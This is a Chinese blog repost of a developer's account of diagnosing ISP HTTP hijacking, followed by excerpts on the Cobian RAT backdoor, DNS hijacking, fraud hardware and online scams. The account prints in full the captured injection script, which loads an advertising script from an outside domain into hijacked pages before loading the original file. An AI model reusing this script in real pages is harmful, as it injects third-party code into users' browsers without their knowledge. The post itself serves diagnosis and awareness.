一次 ISP 劫持 HTTP 请求,我是这样发现的

幸运草
幸运草
幸运草
896
文章
3
评论
2020年3月28日15:26:56 评论 327

一次 ISP 劫持 HTTP 请求,我是这样发现的

编者按:Fundebug的客户通过分析我们提供的报警信息,定位了一个非常棘手的问题—ISP劫持http请求。他的分析过程非常有意思,同时也提醒我们,应该及时支持HTTPS来保证站点安全。

最近业务系统经常受到前端报错邮件

一次 ISP 劫持 HTTP 请求,我是这样发现的

发现大量的ip为沈阳联通客户⇒初步推断为运营商http劫持

一次 ISP 劫持 HTTP 请求,我是这样发现的

经过现场排查发现出错画面部分js加载出错

一次 ISP 劫持 HTTP 请求,我是这样发现的

区别在于错误的js会先插入一个广告js
为区别是否dns劫持查看NetWork面板

一次 ISP 劫持 HTTP 请求,我是这样发现的

IP正确并且为我方服务器IP确认并非为DNS攻击。

由于大面积出现沈阳联通问题,(故而考虑应当为运营商问题?应该不会出现大范围路由器被黑的可能吧)

返回js如下:

(function () {
    try {
        var o = 'm-_-m',
            D = document;
        if (!D.getElementById(o)) {
            var j = 'http://yunxiu.f6car.com/kzf6/js/basic/XXX.js',
                J = j + (~j.indexOf('?') ? '&' : '?') + new Date().getTime(),
                M = 'http://pc.quansj.cn/?cid=08',
                C = D.currentScript,
                H = D.getElementsByTagName('head')[0],
                N = function (s, i) {
                    var I = D.createElement('script');
                    I.type = 'text/JavaScript';
                    if (i) I.id = i;
                    I.src = s;
                    H.appendChild(I);
                };
            if (self == top) {
                N(M, o);
            }
            if (!C) {
                C = (function () {
                    var S = D.scripts,
                        l = S.length,
                        i = 0;
                    for (; i < l; ++i) {
                        if (S[i].src === j) {
                            return S[i];
                        }
                    }
                })();
            }
            C && ((C.defer || C.async) ? N(J) : D.write('<script src="' + J + '"><' + '/script>'));
        }
    } catch (e) {}
})();

通过域名Whois反查

一次 ISP 劫持 HTTP 请求,我是这样发现的

发现旗下域名

一次 ISP 劫持 HTTP 请求,我是这样发现的

有好几个都是广告劫持网站

貌似和一个说脱口秀的(赵本山徒弟)同名……该不是同一个人吧/(ㄒoㄒ)/~~

和沈阳联通沟通后无果,拒不承认存在劫持。目前正在求助工信部,不知能否有解决方案。

一次 ISP 劫持 HTTP 请求,我是这样发现的

github上已经有针对该地址的adblock了……明显辽宁联通

看了一下js选项,正常情况下会执行到

C&&((C.defer||C.async)?N(J):D.write('<script src="'+J+'"><'+'/script>'));

代码做了判断,如果支持defer或者async这直接append异步加载js,当不支持则直接通过document写入(同步执行)

也就是说理论上会同步加载我们服务器上的js~但是事实上出现了大量的js未加载到

经过查阅发现chrome有个设置(据说chrome55(?)+版本后优化)可以尝试一下chrome://flags/#disallow-doc-written-script-loads

一次 ISP 劫持 HTTP 请求,我是这样发现的

具体说明如下

With this data in mind, Chrome, starting with version 55, intervenes on behalf of all users when we detect this known-bad pattern by changing how document.write() is handled in Chrome (See Chrome Status). Specifically Chrome will not execute the<script> elements injected via document.write()when ****all**** of the following conditions are met:

The user is on a slow connection, specifically when the user is on 2G. (In the future, the change might be extended to other users on slow connections, such as slow 3G or slow WiFi.)

The document.write() is in a top level document. The intervention does not apply to document.written scripts within iframes as they don't block the rendering of the main page.

The script in the document.write() is parser-blocking. Scripts with the 'async' or 'defer' attributes will still execute.

The script is not hosted on the same site. In other words, Chrome will not intervene for scripts with a matching eTLD+1 (e.g. a script hosted on js.example.org inserted on www.example.org).

The script is not already in the browser HTTP cache. Scripts in the cache will not incur a network delay and will still execute.

The request for the page is not a reload. Chrome will not intervene if the user triggered a reload and will execute the page as normal.

Third party snippets sometimes use document.write() to load scripts. Fortunately, most third parties provide asynchronous loading alternatives, which allow third party scripts to load without blocking the display of the rest of the content on the page.

貌似我们不符合条件4 暂时先考虑一下;

代码format完后大惊失色……整个加载js的前提是画面中没有id为m—m的节点。否则不会进行加载js ,即不会执行document.write

如果悲催的是我们画面中存在2个或两个以上的js被劫持,那么除了第一个js其余均不会加载。

那么查看了一下js请求(带有queryString),发现,

一次 ISP 劫持 HTTP 请求,我是这样发现的

果然当时客户的请求了commonjs,也就是commonjs也被劫持了。此刻画面中出现了m—m节点。导致其他被劫持的js不会加载真实的js……

再说一下关于我们首页的劫持(跳转?)

一次 ISP 劫持 HTTP 请求,我是这样发现的

本文来源于:一次 ISP 劫持 HTTP 请求,我是这样发现的-变化吧博客
特别声明:以上文章内容仅代表作者本人观点,不代表变化吧博客观点或立场。如有关于作品内容、版权或其它问题请于作品发表后的30日内与变化吧联系。

转载请注明:{{title}}-变化吧
  • 赞助本站
  • 微信扫一扫
  • weinxin
  • 赞助本站
  • 支付宝扫一扫
  • weinxin
幸运草
免费“工具”的背后——网络犯罪分子劫持黑客的阴谋 劫持

免费“工具”的背后——网络犯罪分子劫持黑客的阴谋

要知道,在这个世界上没有什么是免费的。 如果此刻您正在互联网上搜索免费的黑客工具,那么就需要注意,大多数能够免费提供的工具,也只不过是一个骗局而已。比如在去年,我们报道了一个有关于Facebook的黑客工具,它确实是有能力去攻击Facebook帐户,但它其实并不是你想要的工具,因为所有人都能获得它。 在最近,又有一个远程访问木马(RAT)构建工具包可以在多个地下黑客论坛上免费找到,它包含一个后退模块,能够帮助作者访问受害者的网络时提供工具箱的所有数据。 该远程访问木马(RAT)构建工具包所构建的恶意软件在今年2月份就已经开始流通了,其与njRAT和H-Worm系列恶意软件有一些相似之处,至少已经可以追溯到2013年。 据Zscaler的ThreatLabZ研究人员发现,这个远程访问木马(RAT)构建工具包包含的“免费恶意软件构建器”很可能允许其他黑客玩家相对轻松地构建自己的Cobian RAT版本。 一旦犯罪分子使用这个免费的构建器创建自己的恶意软件版本,他们就可以通过受损网站或传统的垃圾邮件活动将其分发给世界各地的受害者,并且能够将受影响的设备招募到恶意的僵尸网络中。 然后Cobian RAT会窃取受损系统上的数据,截取屏幕截图,记录音频和摄像头视频,安装和卸载程序,执行shell命令,使用动态插件和管理文件的功能。 网络犯罪分子想要劫持黑客 我想如果您知道恶意软件构建工具包的作者提供的所有功能都是免费的,那么您会感到非常兴奋。 但不幸的是,使用这种免费的Cobian RAT恶意软件构建工具包创建的自定义RAT具有隐藏的后门模块,可以连接到套件作者的命令和控制(C&C)基础设施的Pastebin URL。 任何时候,后门都可以被套件的原始作者使用,向所有建立在平台顶端的RAT发出命令,使被他们感染的wannabe黑客和受感染的系统处于危险之中。 在周四刊登的博客文章中,Zicaler安全研究部高级主管Deepen Desai写道:“使用这个套件来传播恶意软件,并从最终用户中来窃取第二级运营商。实际上,我们这是被作者所欺骗,想想多么讽刺的一件事。 ” “作者本质上是想使用众多模型来构建一个利用第二级运营商Botnet的僵尸网络。” 研究人员还解释说,原来的Cobian开发人员是“依靠二级运营商来建立RAT Payload并进行传播感染的”。 目前来看,由于具有后门模块,作者可以全面控制Cobian RAT僵尸网络中的所有受损系统。 甚至可以通过更改其配置的C&C服务器信息来删除二级运营商。 研究人员最近在来自巴基斯坦一家提供防御和电信方案的网站(可能会受到影响)观察到了Cobian RAT的payload,其被做成了MS Excel电子表格伪装在.zip文件夹中进而进行攻击。 特别声明:以上文章内容仅代表作者本人观点,不代表变化吧观点或立场。如有关于作品内容、版权或其它问题请于作品发表后的30日内与变化吧联系。 体验了下微信小程序,觉得微信小程序是创业者的“试验田”
当心!你的DNS可能被劫持了! 劫持

当心!你的DNS可能被劫持了!

百度疑遭神马流量劫持 搜索暗战又将爆发?近期,有网友在微博上爆料说,在使用百度搜索的时候,浏览完落地页返回搜索结果页时,会进入到一个虚假的百度移动搜索结果页,一眼看去与百度搜索并无差别,但仔细观察会发现,该页面提供的搜索结果充斥大量低俗色情的内容,网友直呼“感觉上了一个假百度”,严重的影响了网友们的… 大家可能遇到过以下情况: 网速突然变慢,延迟变高,甚至网页都打不开,但 QQ 这类腾讯软件却可以正常使用;明明以前没有广告的网站出现了很多弹窗广告;不同电脑访问同一个网站、玩同一个游戏速度和延迟明显不一样;游戏、软件更新缓慢…… 出现以上情况,很可能是你的 DNS 被劫持了。 1DNS是什么? 假设你的上网设备是生活在互联网世界的“互联网人”,他想去 Taobao.com 大型购物中心,但是现在他只知道这个购物中心叫做 Taobao.com(只知道域名),不知道具体地址(不知道 IP 地址),他还是没办法到达目的地。 这时候他想起来自己有一个记事本,专门用来记录不同的域名和它们的IP地址,这个记事本叫做 Hosts。 他打开Hosts一看,里面 Baidu.com 车站的地址是220.181.38.148,但没有记录 Taobao.com 大型购物中心的地址。 他又想起来可以打开导航软件搜索,导航软件可以告诉你Taobao.com 大型购物中心的具体地址,这个导航软件在互联网中叫做DNS服务器。 因此DNS服务在我们访问网站的时候起到导航的作用。 2DNS污染 前面提到,DNS能够在我们访问网站的时候起到导航的作用,但导航也可以让我们走错路。 举个例子:某些无良DNS服务器,在将IP地址发给你的时候会夹带私货,让原本干净的网页出现广告,这就叫DNS污染。 3DNS劫持 更缺德的DNS服务器,会把你带到另一个网站,比如数字编号的导航网站、钓鱼网站,这就叫DNS劫持。 如果你不修改DNS,通常DNS系统会默认使用运营商提供的DNS,也就是离你最近的服务器,而有些 DNS 污染和劫持很可能来自你的网络提供方,毕竟卖广告的收益很高。 那为何腾讯软件不受影响呢?因为 QQ 等腾讯软件直接通过内部IP地址连接腾讯服务器,不走 DNS 服务器,这样既能保证安全又能保证快速。 4解决方法 ①手动修改DNS 以Windows 7为例: 控制面板 - 网络和 Internet - 网络和共享中心,点左边的「更改适配器设置」 右键正在使用的网卡 - 属性 - Intelnet 协议版本 4,手动指定 DNS 服务器地址。 首选和备选建议都填上。 当在首选服务器无法正常解析域名的时候,会自动用备选服务器来代替。如果没有填备选服务器,或者备选服务器也无法解析域名,网页就打不开了。 小石这里提供两个免费的DNS服务器供大家选择: 114DNS: 首选114.114.114.114 备选114.114.115.115 谷歌DNS: 首选8.8.8.8 备选8.8.4.4 ②修改路由器密码 1、在地址栏中输入:http://192.168.1.1(如果页面不能显示可尝试输入:http://192.168.0.1)。 2、填写您路由器的用户名和密码,路由器初始用户名为admin,密码也是admin,如果您修改过,则填写修改后的用户名和密码,点击“确定”。 3、填写正确后,会进入路由器密码修改页面,在系统工具——修改登录口令页面即可完成修改(原用户名和口令和2中填写的一致)。 特别声明:以上文章内容仅代表作者本人观点,不代表变化吧观点或立场。如有关于作品内容、版权或其它问题请于作品发表后的30日内与变化吧联系。案例|不停弹出广告窗口?你可能遇到了“流量劫持”你可能曾经有过这样的上网经历 打开某网页后不停地弹出广告窗口 点进去的网页自动导航 至另外一个未知网页 使用手机软件时莫名出现低俗广告 …… 其实这就是 流量劫持 或许当你按下电脑开机按钮或者打开手机APP软件时,流量劫持便已经悄然发生。部分不法分子利用手中掌…
8种网络黑灰产作案工具 劫持

8种网络黑灰产作案工具

个人信息安全、黑灰产业链... 这些词语近年来高频出现 除了网络安全相关的专业人士 现在普通的网络用户 对网络安全的重视程度也越来越高 9月17日,2018国家网络安全宣传周——网络安全博览会揭幕。本次展会集中展示网络安全领域的新技术和新理念等内容。而且,在博览会上,有展馆展示了多种网络黑灰产作案工具。 比如: ①能够同时操控16张电话卡进行虚假注册的猫池; ②成本不足百元却能悄无声息偷走手机短信的“2G短信嗅探设备”; ③可以任意修改来电号码的VOIP网络电话设备; ④还有能对目标主机发起远程物理攻击的BadUSB病毒; ⑤用于信息窃听流量劫持的大菠萝Wifi Pineapple和伪基站; 等等...... 以下就是展馆展示的八大网络黑灰产作案工具: 1猫池(可以同时接受多个用户拨号连接的设备) 涉及黑灰产类型:大规模薅羊毛、电信诈骗 作案方法:在猫池设备上,可以同时管理大规模的电话手机卡,通过配套的软件可以实现同时接收、发送短信,拨打电话的功能。黑灰产的猫池上的电话卡,常为通过黑产渠道拿到的非实名认证的廉价电话卡。猫池常被黑灰产用来在各大电商平台上进行大规模网络手机账号垃圾注册,为薅羊毛提供必须的账号资源。 22G短信嗅探设备 涉及黑灰产类型:电信诈骗、信息窃听 作案方法:2G短信嗅探设备总材料不足100元,但可以做到获取周边任何人的短信内容,危害非常大。基站以广播方式转发到用户手里的加密短信,可被这套设备所截取并破解还原出来,最终被黑产用于实现信息窃取、资金盗刷和网络诈骗等犯罪。当前此类犯罪只针对移动与联通,不针对电信,同时这种犯罪只针对2G信号。部分手机3G、4G也可被监听,原因是部分信号会降频成2G信号。 3公民个人信息四件套 网路配图 涉及黑灰产类型:电信诈骗、洗钱 作案方法:黑产人员经常到偏远乡村,以100元到300元不等的低廉价格,购买当地农民的身份证,以及用这些身份证办理的银行卡和手机卡。最终形成了黑产口中的个人信息四件套,即“银行卡,身份证,手机号卡,网银U盾”。购买者多将“四件套”用于电信诈骗、伪卡盗刷、洗钱、销分等犯罪活动中。 4移动AP+物联网卡 网络配图 涉及黑灰产类型:电信诈骗 作案方法:匿名防追踪是电信诈骗人员最关注的自保措施。近年来,黑产已经远离公共家庭无线、有线网络环境,转向了便携可移动的无线设备,来达到反追踪的效果,便携、低价的移动AP已成为黑产常用移动网络设备。此外,产生的流量卡更多是来自实名制度还未完全覆盖的物联网卡。无固定点位,网络身份未实名,这些特点加大了办案人员的侦察难度。 5VOIP/GOIP网络电话设备 涉及黑灰产类型:电信诈骗 作案方法:根据公安部的资料,近年发生的电信诈骗案中,使用网络改号电话作案的占90%以上。VOIP协议能够将网络语音转成网络数据包,用户收到的存储在该网络数据包中的来电号码可被修改,不法分子正是使用此原理将来电号码进行了任意替换。当前展示的GOIP设备是近年来诈骗电话的另外一个方向,该设备能够将传统电话信号转为网络信号,从而起到不法分子隐藏真实身份反侦察的效果。 6BadUSB 网络配图 涉及黑灰产类型:病毒木马 作案方法: 2014年,位于柏林的SR安全研究实验室专家发现了一个代号“BadUSB”的重大USB安全漏洞,该漏洞影响全球数十亿设备。使用BadUSB设备,可以对目标主机发起物理攻击,插入U盘后,该设备可以自动运行提前设置好的攻击代码,从而控制被害人的电脑,更为致命的是,由于是硬件发起的攻击,因此当前还没出现一个有效的解决方案。 提醒:为了安全起见,日常请勿随意使用你无法确保安全的USB设备。 7大菠萝WifiPineapple 涉及黑灰产类型:信息窃听、流量劫持 作案方法:大菠萝路由器的原理是网络中间层入侵劫持,这种设备可以伪装出一个免费的WIFI信号,让用户上钩从而达到获取用户个人信息或推送伪装过的后台程序的目的。当任意用户连接上由此设备创建的WIFI时,用户的浏览记录就会被监听,用户访问网页时候的站点也可以随时被修改替换。经过简单配置,此设备也可以强制使附近的客户端连接到自己创建的伪装WIFI ,而不需要用户去主动连接。 提醒:请谨慎使用公共场合的WIFI热点。 8伪基站 网络配图 涉及黑灰产类型:电信诈骗 作案方法:伪基站设备是嫌疑人私自组装生产的一种违法高科技仪器,能够强制连接用户手机信号,摄取一定半径范围内的手机信息,可以任意冒用手机或公用服务号码强行向用户手机发送短信。伪基站设备实施违法犯罪是一种新型犯罪,涉及地域广、社会危害大,严重危害国家通讯安全,扰乱社会公共秩序,影响人民群众安全感。 据展馆所属公司相关负责人介绍,展示网络黑灰产前沿内容,是为了让广大人民群众更深入了解网络安全的复杂形势,提升网络安全的防范意识,避免和减少诈骗等具有严重社会危害的黑灰产案件发生。 来源:看作者 特别声明:以上文章内容仅代表作者本人观点,不代表变化吧观点或立场。如有关于作品内容、版权或其它问题请于作品发表后的30日内与变化吧联系。
网络诈骗就在我们身边,时刻提高警惕 劫持

网络诈骗就在我们身边,时刻提高警惕

为什么DNS监测能够让你的网络更加安全但由于极少有公司会出于安全目的监测DNS状态,DNS如今已成为攻击者理想的攻击手段。 在DNS层实施安全防御,可以有效检测和控制此类恶意软件感染。在恶意连接建立之前将威胁扼杀在摇篮里是做好安全的第一要务。要做到这一点,就必须监控网络,跟踪员工及其使用设备的网络… 诈骗运作模式正在呈现专业化、公司化的趋势,犯罪手段也变得更加智能,并且已经逐渐形成了“恶意注册-引流-诈骗-洗钱”等各环节精细分工的完整链条,形成了网络诈骗的“新范式”。 今天,带着大家一起来“盘一盘”5大新型网络黑产案件,希望大家识别套路,不再陷入不法分子的陷阱! 1- 出租收款码轻松“躺赚”?实则在为黑产洗钱 - 所有人都希望能找到一份钱多、活少、离家近的工作,可惜打着这种广告的通常不是诈骗就是传销。 近年来,网上突然流传起一种“出租收款码”的赚钱方式,据说只需要提前交付对方一定数额的押金,再按照对方要求输入收款金额,然后把收款码截图发送给对方,就能按照收款金额拿到一定比例的佣金。 但其实,这套“出租收款码”的模式原来是非法赌博网站精心研究出的新型洗钱路径,利用互联网上的庞大用户把他们的赃款分散,最终漂白? 在这条洗钱路径中,赌博网站通过中介平台和代理商把赌博用户充值的赃款下发给“出租收款码”的用户,这部分用户在扣取自己的收益后把剩下的钱再通过代理商返还给中介平台,中介平台和代理商收取各自的利益后再把钱打给赌博网站。 这样一来,非法赌博网站数以亿计的赃款就能通过这些私人账户分批分量地运作,最终把钱赃款漂白,并且由于洗钱路径隐蔽分散,也加大了警方的侦查难度。 这个案件里最可怕的还在于,这一次参与者并不仅是受害者,还在不自觉中沦为了违法犯罪活动中的工具,可能需要承担法律责任! 所以,各位小伙伴们在面对“天上掉馅饼的好事”时,一定要注意提高警惕!想占小便宜的人,很可能会被别人占了大便宜。?点击查看案例详情哟>>>躺着就赚钱的项目?出租 “收款二维码”,你只会成为黑产链条上一只“待宰的羔羊”! 2- 谈恋爱误入“杀猪盘”?这种爱情在为黑产引流 - 如果说,你是一名大龄单身青年,现在突然有个“灵魂伴侣”降临到你身边,他的一切都符合你的“幻想”;为了两个人的未来,他打算利用公司的系统“漏洞”带你发大财,你会不会心动? 小心了,不仅赚钱是假的,这份爱也是假的!这其实是令无数受害者“伤心伤财”的“杀猪盘”? “杀猪盘”是业界的一种俗称,实际上它是指一种打着交友名义,通过培养感情获取信任,再诱惑受害者至博彩网站投资,从而实施敛财的新型情感投资类诈骗。 此类骗局最早兴起在2017年,以男性同志和单身大龄女青年等感情寂寞的人士为主要目标,而操盘者的大本营大多设在东南亚,尤其是在菲律宾、柬埔寨、泰国、马来西亚等允许线上赌博的国家。 一支完整的“杀猪盘”团队,通常会分为资料组、话务组(钓鱼)组、技术组,以及洗钱组。 资料组是实行犯罪的基础,他们的工作就是快速筛选用户,找到那些容易上当受骗的人; 话务组是直接与受害者接触的“前线”,主要任务就是利用目标人群对于美好生活的渴望、精神的空虚和对爱情的向往,打造一个“完美的恋爱人设”; 技术组的主要工作内容是为资料组及话务组提供技术支持,就包括获取受害者信息、制造假的照片音频视频等身份证据以及最重要的搭建博彩网站、控制博彩中奖概率、直接修改胜负概率等; 而洗钱组,顾名思义就是要将骗来的钱“漂白”成可用于流通的正常款项。 与其他纯粹圈钱敛财的骗局不同,在“杀猪盘”这样的情感类诈骗中,受害者往往曾认真付出过感情,而当他发现自己被欺骗后,失去的就远不止是金钱,还有爱情的毁灭,人财两空的打击会对其身心造成巨大损害。 因此,我们在网络交友时,一定要留心查证对方身份,不随便轻信陌生人。?点击查看案例详情哟>>>编剧都不敢这么写!40岁女子网恋3帅哥,次次都是“杀猪盘”! 3- 出国务工“高薪梦”,成为“狗推”被困海外 - 海外办公、包吃包住、工资高而且还有许多福利?这么好的机会,还不速来把握?! 在很多招聘平台上,我们时常能看到这样极具诱惑力的类似广告。但奇怪的是,无一例外,对方的“门槛”都很低,不会有工作经验、学历、专业的要求,大伙觉得这是怎么回事呢? 真相就是,这可不是一份“正经工作”,而是担任“网络博彩”行业推广业务员! “狗推”是网络博彩行业推广业务员的简称,让受害者人财两空的“杀猪盘”就是他们的杰作之一。“狗推”上要对老板负责(也被称为“狗庄”),服从管理,为老板赚钱,拿微薄的提成;下要寻找作案对象,把那些期待爱情、期待激情、期待志同道合的人,发展为待宰的“大肥猪”。 在外人面前他们留给大家印象大多是光鲜亮丽,一个个非富即贵。但实际上,却过着猪狗不如的生活。在这些员工之中,很多人是在不知真相的情况被忽悠而来的,还有一部分人是专门付了中介费出国务工的,没做满半年的话就得给公司赔付,同时,如果没有完成公司制定的业绩,就会遭到公司的警告、记错、罚款甚至是毒打、软禁。 值得一提的是,这些“狗推”一方面是受害者,被不法分子忽悠而进入这行业,同时在这过程中不仅挣不到钱还可能受到生命威胁;而另一方面,还有一些“狗推”由于公司的“文化宣传”、“激励制度”最终利欲熏心,被“洗脑”成一个实打实的“职业狗推”,成为了“庄家”的帮凶,四处坑骗同胞。 想要提醒大家,在网上寻找工作时,一定要核实公司与职务的真实性,不要被“诱惑”蒙蔽了双眼,最终陷入无尽深渊。?点击查看案例详情哟>>>刷来刷去还是那波“狗推”的人,只不过他们升级了.... 4- 动辄千万的“数据神话“,背后完整的“刷量”黑产 - “十秒卖出上万件产品,2小时销售额超千万”“日均视频播放量50万人次,坐拥全网百万粉丝”……在各大平台上,KOL(网红、大V等意见领袖)正在创造一个又一个的“数据神话”。 然而,这些数据都是真的吗?不,这里头,水分可是真不少。? 据 “2019 中国文娱金数据年中发布会”数据显示:2019年上半年全网无效声量再创新高,达到了71%,无效用户的占比高达49.4%。也就是说,在全网范围内可能有近一半的用户都是“僵尸粉”,是假人。 从粉丝数、互动量、播放量……任何数据都可以轻易飙升,都可以造假,“刷量”服务随着技术的日益升级,已然形成了一条专业化、体系化、分工明确的黑色产业链。 那究竟是如何在短期内“创造”出庞大的网络流量数据的呢?这就得提到虚假流量运作手法和庞大的刷量工作人员了。 第一种最低级的做法就是单纯依靠机器进行自动刷量,刷量者通过代理IP和模拟登陆态势的形式制造虚拟用户,并引入“群控”技术,实现由一台电脑控制多台手机、多个账号的批量操作。 第二种高级一些的,刷量方通过各大网络社交平台,雇用了大批的网友来充当“投手”组团完成刷量任务,例如当有一篇文章需要刷点击率时,需求方就会将文章链接发布到由数百位“投手”组成的任务群,并要求每个人点击。 最新的刷量手法,则是依靠“人工+机器组合刷量”,它将人工刷与机器刷巧妙的结合在一起,先通过网络社交平台搜集、雇佣和租赁大量的真实账号,接着将“挂机平台”作为一个中台,链接账号和下游的机器刷量平台,通过“挂机平台”自动进行刷量服务。 其实,凭借“制造出来的虚假流量”营造的数据狂欢不仅难以持续,而且还可能引发多种危害,我们所有人都应该自觉抵制数据流量的造假行为! 5- 不断翻新的”网络赌博“,已形成完整产业链 - 随着网络科技的不断发展,一些不法分子也乘上了互联网的快车;他们利用网络的强互动性、支付方便、流量庞大等特点,将从前四处躲藏流窜的地下赌庄,变成了如今可以实时下注的赌博网站、赌博APP。 并且,如今的“网络赌博”,从搭建平台的技术人员、负责推广的推广人员、后台操控的技术人员到负责洗钱的后台人员等已然形成了一条分工明确、公司化、制度化运作的完整产业链? 首先,随着近年来移动通信的发展,网络赌博逐渐发展出移动化的APP形式,不法分子在建立赌博平台时就会利用“强伪装”使其更具有迷惑性和隐蔽性。 其次,为了扩大“客流”,这些赌博平台都会使用线上线下双重推广来宣传引流。线下推广方式除了雇佣大量的临时工,张贴小广告、发小卡片外,主要是通过利诱会员发展下线,实现“人拉人”,而线上则通过网络域名劫持、盗取信息群发消息、利用社交平台、网站等方式引流。 最后,如今的网络赌博已经衍生出了除专业赌博网站、赌博APP外的”丰富“参赌形式,例如借网络游戏抽装备“开赌场”、开发直播软件“设赌局”等等。 在此,要警示大家,组织和参与“网络赌博”都是违法行为;我们既要做到自觉抵制赌博,另一方面若有发现相关赌博情况,也应该第一时间进行举报投诉哦! 特别声明:以上文章内容仅代表作者本人观点,不代表变化吧观点或立场。如有关于作品内容、版权或其它问题请于作品发表后的30日内与变化吧联系。从容应对“网络挟持”,从最低层级解决安全风险!您是一家领先制造企业的负责人,负责整个北美地区的运营,在某天和往常一样工作时,突然接到报告,称最大一家工厂的产品出现了瑕疵。这种问题已经出现了一段时间,且一直在加剧,但工厂经理却无法确定出现瑕疵的根源。工厂似乎一切运行如常。我们是让所有设备停止运行,实施更详细…